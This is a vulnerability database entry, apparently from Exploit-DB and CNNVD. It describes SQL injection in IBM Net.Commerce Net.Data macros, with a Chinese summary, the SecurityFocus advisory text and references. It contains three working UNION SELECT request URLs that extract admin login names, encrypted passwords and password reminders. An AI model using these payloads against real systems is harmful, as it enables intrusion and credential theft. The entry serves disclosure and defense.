https://www.exploit-db.com/exploits/20618
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200105-058

Net.Commerce是IBM发行的Websphere的一部分。它提供了一些通用特性使电子商务变得更加容易，其性能和可靠性也有独到之处。它默认支持的宏特性未对用户输入进行适当的检查，远程攻击者可以利用SQLInjection技术以帐号DB2INST1的权限执行任意SHELL命令。IBM已经修正了随Net.Commerce3.2、WebSphereCommerceSuite4.1发布的有安全漏洞的宏，但是用户自定义宏可能存在同样的安全漏洞。WebSphereCommerceSuite5.1不受此问题影响，它不使用Net.Data宏。

source: http://www.securityfocus.com/bid/2350/info

IBM's Net.Commerce ecommerce platform supports macros which, by default, do not properly validate requests in user-supplied input. A thoughtfully-formed request to a vulnerable script can cause the server to disclose sensitive system information, including results of arbitrary queries to the Net.Commerce database. This can allow an attacker to obtain an elevation of privileges to that of the DB2INST1 account, and potentially issue arbitrary shell commands as the DB2INST1 user.

IBM fixed the vulnerable macros they ship with the product in Net.Commerce Versions 3.2 and WebSphere Commerce Suite 4.1. Custom macros created by the user may be vulnerable to this type of attack. WebSphere Commerce Suite Version 5.1 is not vulnerable at all as it does not use Net.Data macros. 

To obtain the administrator accounts use the following URL:

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';

To obtain the encrypted passwords use the following URL:

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

To obtain the password reminders use the following URL:
http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

"orderdspc.d2w" is not the only vulnerable macro. It is just used as an example. Casting between different data-types is possible. Read the DB2 manual pages.

It may also be possible to query other databases.

来源:BID
名称:2350
链接:http://www.securityfocus.com/bid/2350
来源:www-4.ibm.com
链接:http://www-4.ibm.com/software/webservers/commerce/netcomletter.html
来源:BUGTRAQ
名称:20010205IBMNetCommerceSecurity
链接:http://archives.neohapsis.com/archives/bugtraq/2001-02/0072.html
来源:XF
名称:ibm-netcommerce-reveal-information(6067)
链接:http://xforce.iss.net/xforce/xfdb/6067